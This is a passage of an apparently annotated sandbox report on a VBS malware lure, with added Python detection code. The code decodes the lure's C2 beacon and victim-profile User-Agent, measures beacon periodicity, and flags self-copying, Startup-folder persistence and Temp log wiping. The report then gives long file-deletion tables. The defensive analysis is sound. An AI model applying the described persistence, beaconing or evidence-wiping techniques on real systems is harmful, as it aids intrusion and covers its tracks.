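    "20:33:47.679172039", "20:34:01.086682081", "20:34:27.979749918",
    "20:34:41.336472034", "20:34:54.392508984",
]


def parse_request(raw):
    """Split an HTTP/1.1 request into method, path, version and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; "host:port" survives
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def decode_user_agent(ua):
    """Decode the seven '<|>'-separated victim-profile fields, or None if the
    header is not in that shape.  Labels are this example's reading of the format."""
    parts = [p.strip() for p in ua.split("<|>")]
    if len(parts) != 7:
        return None
    ident, _, hostname = parts[0].partition(" | ")   # "5F155A24 | MeoIT"
    flag, _, date = parts[6].partition(" - ")        # "false - 1/17/2018"
    return {"id": ident, "hostname": hostname, "computer": parts[1],
            "user": parts[2], "os": parts[3], "tag": parts[4],
            "av": parts[5], "flag": flag, "date": date}


def is_is_ready_beacon(raw):
    """Match on request shape, not on the Host value: the C2 here is a dynamic-DNS
    name on port 83, both of which the operator can change without touching the script."""
    req = parse_request(raw)
    h = req["headers"]
    return (req["method"] == "POST" and req["path"] == "/is-ready"
            and h.get("content-length") == "0"
            and decode_user_agent(h.get("user-agent", "")) is not None)


def beacon_periodicity(timestamps, tolerance=1.0):
    """Median gap between check-ins (seconds) and the fraction of gaps within
    `tolerance` of that median.  Times are HH:MM:SS.fffffffff on one day; the
    nanosecond digits are cut to the microseconds strptime accepts."""
    times = [datetime.strptime(t[:15], "%H:%M:%S.%f") for t in timestamps]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    median = statistics.median(gaps)
    regular = sum(1 for g in gaps if abs(g - median) <= tolerance) / len(gaps)
    return round(median, 3), round(regular, 2)


if __name__ == "__main__":
    profile = decode_user_agent(parse_request(SAMPLE_REQUEST)["headers"]["user-agent"])
    print("beacon:", is_is_ready_beacon(SAMPLE_REQUEST), profile)
    print("median gap / regular fraction:", beacon_periodicity(SAMPLE_TIMESTAMPS))
```

On the report's timestamps the median gap is about 13.4 s and 8 of the 10 gaps fall within a second of it; the two outliers are the long pause after session 2 and the missing session 10. A periodicity check like this is what distinguishes a beacon from ordinary keep-alive traffic, and it survives a change of hostname or port that would defeat an indicator-only rule.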

Code Manipulations

Statistics

Behavior

• wscript.exe
• explorer.exe
• explorer.exe
• explorer.exe
• explorer.exe
• explorer.exe
• explorer.exe
• wscript.exe

System Behavior

Analysis Process: wscript.exe PID: 3100 Parent PID: 2852

General

Start time: 20:26:16
Start date: 17/01/2018
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\AuthorizationForm.vbs'
Imagebase: 0x6c5d0000
File size: 141824 bytes
MD5 hash: 979D74799EA6C8B8167869A68DF5204A
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

File Created

Source File Path: C:\Users\user\AppData\Roaming\AuthorizationForm.vbs
  Access: read data or list directory and read attributes and delete and synchronize and generic write
  Attributes: archive and non directory file
  Options: sequential only
  Completion: success or wait; Count: 1; Address: 6F309434; Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Roaming\AuthorizationForm.vbs\:Zone.Identifier:$DATA
  Access: read data or list directory and synchronize and generic write
  Attributes: none
  Options: sequential only and synchronous io non alert
  Completion: success or wait; Count: 1; Address: 6F309434; Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs
  Access: read data or list directory and read attributes and delete and synchronize and generic write
  Attributes: archive and non directory file
  Options: sequential only and synchronous io non alert
  Completion: success or wait; Count: 1; Address: 6F309434; Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs\:Zone.Identifier:$DATA
  Access: read data or list directory and synchronize and generic write
  Attributes: none
  Options: sequential only and synchronous io non alert
  Completion: success or wait; Count: 1; Address: 6F309434; Symbol: CopyFileW

Source File Path: C:\Users\user\AppData\Local\Temp\Luu_Tam_Nhe
  Access: read data or list directory and synchronize
  Attributes: normal
  Options: directory file and synchronous io non alert and open for backup ident and open reparse point
  Completion: success or wait; Count: 1; Address: 6F2F47C8; Symbol: CreateDirectoryW
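The rows above are the persistence step: the script copies itself, with the same filename it was launched under, into %APPDATA% and into the per-user Startup folder, and because CopyFileW carries NTFS alternate data streams along, each copy also receives the Zone.Identifier stream (the Mark-of-the-Web) of the original. That stream is worth keeping as a forensic pivot, since it records the zone the lure was downloaded from. The Python below is an added example for this page, not code from the report: it runs host-side rules over event records built by hand from this process's File Created table and a handful of rows from its File Deleted table (which, in the report, runs to well over a hundred log and cache files). The rules are: a script host copying a file whose name equals its own script argument, a script host writing into the Startup folder, the presence of a copied Zone.Identifier stream, and mass deletion of log files under the Temp directories. The rule names, the deletion threshold of 5 and the event layout are assumptions of this example; the paths are the report's, written in the usual file:stream:$DATA form (the report prints a backslash before the colon, and the stream regex accepts both).

```python
"""Added example for this page, not code from the Joe Sandbox report:
host-side rules over the file activity the report attributes to
wscript.exe (PID 3100).  EVENTS is hand-built from the File Created and
File Deleted tables; rule names and the threshold are our own choices."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Per-user Startup folder, matched case-insensitively inside the full path.
STARTUP_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
TEMP_DIRS = ("c:\\users\\user\\appdata\\local\\temp\\", "c:\\windows\\temp\\")
LOG_SUFFIXES = (".log", ".txt", ".tmp", ".html")
TEMP_WIPE_THRESHOLD = 5  # assumption: chosen for this example, not a vendor setting
# ':Zone.Identifier:$DATA' at the end of a path; the report prints it as '\:Zone...'
STREAM_RE = re.compile(r"\\?:[^\\:]+:\$DATA$")

# Constructed from the report's process "General" block and file tables.
IMAGE = r"C:\Windows\System32\wscript.exe"
CMDLINE = r"'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\AuthorizationForm.vbs'"
EVENTS = [
    {"op": "create", "symbol": "CopyFileW",
     "path": r"C:\Users\user\AppData\Roaming\AuthorizationForm.vbs"},
    {"op": "create", "symbol": "CopyFileW",
     "path": r"C:\Users\user\AppData\Roaming\AuthorizationForm.vbs:Zone.Identifier:$DATA"},
    {"op": "create", "symbol": "CopyFileW",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs"},
    {"op": "create", "symbol": "CopyFileW",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuthorizationForm.vbs:Zone.Identifier:$DATA"},
    {"op": "create", "symbol": "CreateDirectoryW",
     "path": r"C:\Users\user\AppData\Local\Temp\Luu_Tam_Nhe"},
    {"op": "delete", "symbol": "DeleteFileW", "path": r"C:\Users\user\AppData\Local\Temp\AdobeSFX.log"},
    {"op": "delete", "symbol": "DeleteFileW", "path": r"C:\Users\user\AppData\Local\Temp\chrome_installer.log"},
    {"op": "delete", "symbol": "DeleteFileW", "path": r"C:\Users\user\AppData\Local\Temp\jusched.log"},
    {"op": "delete", "symbol": "DeleteFileW", "path": r"C:\Windows\Temp\MpCmdRun.log"},
    {"op": "delete", "symbol": "DeleteFileW", "path": r"C:\Windows\Temp\MpSigStub.log"},
    {"op": "delete", "symbol": "DeleteFileW", "path": r"C:\Windows\Temp\TS_40F9.tmp"},
]


def script_argument(cmdline):
    """Script path handed to the host: the last quoted token on the command line."""
    quoted = re.findall(r"""['"]([^'"]+)['"]""", cmdline)
    return quoted[-1] if quoted else None


def is_stream(path):
    return STREAM_RE.search(path) is not None


def strip_stream(path):
    """Drop a trailing ':<name>:$DATA' (or '\:<name>:$DATA') stream suffix."""
    return STREAM_RE.sub("", path)


def analyze(image, cmdline, events):
    """Return (rule, detail) findings for one process's file events."""
    host = ntpath.basename(image).lower()
    script = script_argument(cmdline)
    script_name = ntpath.basename(script).lower() if script else None
    findings = []
    temp_deletes = 0
    for ev in events:
        path = ev["path"]
        low = path.lower()
        if ev["op"] == "create":
            if is_stream(path):
                # CopyFileW copies alternate data streams, so the Mark-of-the-Web
                # travels with the copy; record it as a forensic pivot, not a verdict.
                findings.append(("motw_stream_copied", path))
                continue
            if (host in SCRIPT_HOSTS and script_name
                    and ntpath.basename(path).lower() == script_name
                    and low != script.lower()):
                findings.append(("self_copy", path))
            if host in SCRIPT_HOSTS and STARTUP_MARKER in low:
                findings.append(("startup_persistence", path))
        elif ev["op"] == "delete":
            if low.startswith(TEMP_DIRS) and low.endswith(LOG_SUFFIXES):
                temp_deletes += 1
    if temp_deletes >= TEMP_WIPE_THRESHOLD:
        findings.append(("temp_log_wiping", f"{temp_deletes} files"))
    return findings


def rule_counts(findings):
    """How many times each rule fired, for a quick summary or a test."""
    counts = {}
    for rule, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, detail in analyze(IMAGE, CMDLINE, EVENTS):
        print(f"{rule:22} {detail}")
```

Matching the copy against the script path taken from the command line, rather than against a hard-coded name, keeps the self-copy rule independent of this sample's filename, and restricting the Startup-folder rule to script hosts keeps it from firing on installers that legitimately write there. The log-wiping rule is a weak signal on its own; here it matters because the same process also persisted and beaconed.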

File Deleted

Source File Path (every row below has Completion: success or wait; Count: 1; Address: 6F309346; Symbol: DeleteFileW)
C:\Users\user\AppData\Local\Temp\AdobeSFX.log
C:\Users\user\AppData\Local\Temp\chrome_installer.log
C:\Users\user\AppData\Local\Temp\clientsharedmui-en-us_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200428.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200428_000_vcRuntimeMinimum_x86.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200428_001_vcRuntimeAdditional_x86.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200522.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200522_0_vcRuntimeMinimum_x86.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200522_1_vcRuntimeAdditional_x86.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200642.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200642_0_vcRuntimeMinimum_x86.log
C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20170807200642_1_vcRuntimeAdditional_x86.log
C:\Users\user\AppData\Local\Temp\user.bmp
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
C:\Users\user\AppData\Local\Temp\java_install_sp.log
C:\Users\user\AppData\Local\Temp\jawshtml.
C:\Users\user\AppData\Local\Temp\jusched.log
C:\Users\user\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170807_200735171-MSI_vc_red.msi.txt
C:\Users\user\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20170807_200735171.html
C:\Users\user\AppData\Local\Temp\officesuitemui-en-us_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\officesuiteww-x-none_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\opatchinstall(1).log
C:\Users\user\AppData\Local\Temp\proof-en-us_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\proof-es-es_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\proof-fr-fr_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\proofing-en-us_MSPLOG.LOG
C:\Users\user\AppData\Local\Temp\SetupExe(201708072012233B8).log
C:\Users\user\AppData\Local\Temp\wmsetup.log
C:\Users\user\AppData\Local\Temp\{18F5A621-73B7-4C32-96D7-2C339FD9E9B7}-60.0.3112.113_60.0.3112.90_chrome_updater.exe
C:\Users\user\AppData\Local\Temp\Adobe_ADMLogs\Adobe_ADM.log
C:\Users\user\AppData\Local\Temp\Adobe_ADMLogs\Adobe_GDE.log
C:\Windows\Temp\ASPNETSetup_00000.log
C:\Windows\Temp\dd_ndp46-kb4024848-x86_decompression_log.txt
C:\Windows\Temp\dd_wcf_CA_smci_20170807_130930_358.txt
C:\Windows\Temp\DMI9059.tmp
C:\Windows\Temp\fwtsqmfile00.sqm
C:\Windows\Temp\KB4024848_20170807_150919192-Microsoft .NET Framework 4.7-MSP0.txt
C:\Windows\Temp\KB4024848_20170807_150919192.html
C:\Windows\Temp\MpCmdRun.log
C:\Windows\Temp\MpSigStub.log
C:\Windows\Temp\RGI3F19.tmp
C:\Windows\Temp\RGI3F19.tmp-tmp
C:\Windows\Temp\TS_40F9.tmp
C:\Windows\Temp\TS_4929.tmp
C:\Windows\Temp\TS_7FC5.tmp
C:\Windows\Temp\TS_ED88.tmp
C:\Windows\Temp\TS_EEDD.tmp
C:\Windows\Temp\TS_EF57.tmp
C:\Windows\Temp\TS_F07A.tmp
C:\Windows\Temp\TS_F1C5.tmp
C:\Windows\Temp\TS_F37F.tmp
C:\Windows\Temp\TS_F3D0.tmp
C:\Windows\Temp\TS_F59E.tmp
C:\Windows\Temp\TS_F60D.tmp
C:\Windows\Temp\Crashpad\metadata
C:\Windows\Temp\Crashpad\settings.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\160[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\common[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\common[2]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\favicon[2].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\host[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\known_providers_download_v1[1].xml
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\progress_bg_fill[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\progress_bg_left[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\progress_fg_right[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\runtime[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\SC[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0316J1PS\welcome[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\favicon[1].ico
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\layout[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\layout[2]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\masthead_fill[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\masthead_fill[2]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\progress[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\progress_en[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\progress_fg_left[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\urlblockindex[1].bin
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0TZNT9WD\welcome[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\160[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\check[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\complete[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\favicon[2].ico
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\host[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\progress_fg_fill[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\rtutils[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\rtutils[2]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\runtime[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\urlblocklist[1].bin
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\welcome_en[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\container.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\complete_en[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\favicon[1].ico
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\favicon[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\Java3BillDevices_EN[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\l10n[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\l10n[2]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\masthead_left[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\masthead_left[2]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\progress_bg_right[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\SC[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DEWWYACU\welcome_en[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FVVY4ARZ\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FVVY4ARZ\Firefox%20Setup%20Stub%2054.0.1[1].exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J384NTPU\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J384NTPU\favicon[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF2I8VH2\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JF2I8VH2\favicon.dc6635050bf5[1].ico
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ1ASBJ0\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NJ1ASBJ0\favicon[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\AntiPhishing\4A72F430-B40C-4D36-A068-CE33ADA5ADF9.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\17k[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\52-7e5bc3-f30905ea[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\5e-ef63ca-91cdfbc1[1].txt
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AAfOIDq[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApASM9[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApAWS2[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApAxXv[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApwV1G[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\AApykUk[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\bs-components[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\btn-app-store.1cfd5dba4a92[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\common-bundle.8e106b1b72c3[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\Firefox%20Setup%20Stub%2054.0.1[1].exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\firefox_new_scene1-bundle.a59db094c561[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\gtm-snippet-bundle.e956015fe7f3[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\latest[1].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\linkid[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\meversion[1]
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\moz-wordmark-light-reverse.cb1bdf6d1de6[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\new[1].htm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\search[1].htm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\site-bundle.5f2462a3ca26[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\stars.8398dac91f60[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\trans[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1SNL0OFP\wc-addons[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\7962161087[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AA61yi9[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApB31p[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApsh0Q[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApwg57[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\AApxnEn[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\ast[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\ast[2].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\btn-app-store.97e640f20e96[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\css[1].txt
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\down-arrow-blue.6c077dd57553[1].svg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\experiment_firefox_new_fc_search_retention.90e6fb3ca1fc[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\firefox_new_onboarding_common-bundle.136a56bfe2b9[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\firefox_new_pixel-bundle.ffe2124229c7[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\gtm[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\header-logo-inverse.510f97e92635[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\html5shiv.d580a4cd1cb4[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\jquery-1.11.1.min[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\MemMDL2.2.17[1].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\optimizely-snippet-bundle.7119ca69b1d6[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\tabzilla-static.953a65a1f4a4[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\th[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\trans[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BX7UEHQ0\WebCore.4.19.0.ltr.light.min[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\container.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\cookies[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\core[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\dest5[1].htm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\FRE-adobe-FPO[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\FRE-FW[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\jquery-ui[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\jquery.min[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\latest[1].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\latest[2].eot
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\p[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FOOIW152\reset[1].css
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\17k[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\246059135[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\AA54rQj[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\AAdAVrM[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\AApB1P2[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\adsWrapperMSNI[1].js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\M0LGGMV3\advertisement.ad[1].js
